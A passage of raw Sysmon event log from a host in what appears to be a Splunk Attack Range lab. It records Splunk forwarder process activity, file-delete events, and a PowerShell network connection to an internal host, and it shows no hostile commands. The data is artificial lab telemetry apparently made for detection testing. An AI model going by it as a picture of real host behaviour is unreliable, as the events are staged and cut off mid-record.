Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.586{B81B27B7-84AF-613A-0497-03000000C801}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035129607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.070{B81B27B7-84AE-613A-0397-03000000C801}67486956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:28.684{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A78784D8684A42BE5CCDC31B8BA0F83F,SHA256=76AA6ED3D3A2151C861775935BABACFD0AE013DF6FCBAA84A56E85577E8E7C0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:52.288{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62311-false10.0.1.12-8000- 23542300x800000000000000035129622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:29.867{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=77E5B90601A1E51CBD0CDAF0F16F92A3,SHA256=BA3B93DAB6E84A16980A75A6C7A861F77B91B6E0100D1D1517255A811F2DEFDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:29.716{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB1A449A03CF7853927ADB4818500B6,SHA256=30EB5073F981EC7F588D855BC1D42EEB7F53E5A194028509A76FC641C348C77F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:30.750{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC1DFFDB6EC0B9FA1226AD49A767B98,SHA256=93CD103042EFEA9BCE0960A931F48197127861ECD44FB01D16D2F9CD0B9B9BE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:55.001{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62312-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:31.764{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE31BB428B4F8C0377260909A64E0D48,SHA256=779A7110F3C2A5CDF0FA287D7F332D45682DBD9E45B0C61F27FBDB0B85C468D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:32.794{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14665572DD6B114D15CF5C53D619F7D6,SHA256=9130035BD380AE4E37F09F205F12CFF38079D9E9E30FACAB1B08C45257CC0D28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:32.779{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7254909f.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:33.811{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D2C8E6B58380D1183F0968E49D9673C,SHA256=E04F5E7758F6B474C22BF892BF4C9C9996BDDE1A2EBB815136560C07BA6539FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:58.318{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62313-false10.0.1.12-8000- 23542300x800000000000000035129630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:34.845{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A0090E214E50D8E6CEA597AAEA45FCD,SHA256=C7CF9A5DC24DCD4290561A4000861DD4EB6755F11A250C3393471AB848769C2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:35.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A9CEAF71EB8E33ADE43CAB491CF7CE67,SHA256=65B55375C9B8E6BB635DFAD66694126B3849813B199F37E6910466566245C23F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:35.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B654CF29428330E561C742B6E44585,SHA256=345CEA5C100C87954C989319D46F8DBA3032D6786C34DDB511038FD56AE1AF31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:36.875{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37EB1615EE223EA82845655E9E2B0ED1,SHA256=BC1EFE8B9B9923B72D424D70E83F8F0E58C48531AF0A4542292619446B82F2D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:37.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65AB47CA0A220A927B6B90788376ADF9,SHA256=8A8CF03EDD0ECB75559BAA51CF9D7AE99463318C8DE5AE7D8BB29DE46413135B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:04:01.016{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62314-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:38.926{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18591275CAB3BE95351E3E4D006F279A,SHA256=0F4C412B8F387E5F8B5C1110B91C30482EA3B2468AEFC11D6A0FE6229A95C8D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:38.005{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=96169C690C825177E5C7CB3F23F56B17,SHA256=98902CDE40B192EBC4C03F9F112234C8ADB6FDF3078F699BE59CBBAD0A638D08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.941{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E761508CD0E259F14240D8CDE22DABA,SHA256=7C693C57D90806F2D06E873D2A28E77BA4DE808A3687BF77DDC0998D6A0DB8AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:04:03.344{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62315-false10.0.1.12-8000- 23542300x800000000000000035129649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.955{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=672553FE672C21F91DCF0B301E9811EE,SHA256=5C94B8FD2E1F3CB9E2BB896904493F14B947B458EFF8B765FCA261BF23806E15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.555{B81B27B7-84BC-613A-0597-03000000C801}28721584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.405{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-84BC-613A-0597-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.403{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.403{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.403{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.403{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.403{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-84BC-613A-0597-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.403{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-84BC-613A-0597-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:40.388{B81B27B7-84BC-613A-0597-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35494A757B0E09F17A223B48E3543357,SHA256=DC36DD06CE161CC4DEC66E74EFD290230B5AC08106FE3B6A9FB8C884835DD329,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=30606B74CF958296F353B0F2276B93E8,SHA256=4EB06973A578D39D681383CB9E33184F5478D16CC41834BD93025D10656B6A7E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.805{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-84BD-613A-0797-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.803{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.803{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.803{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 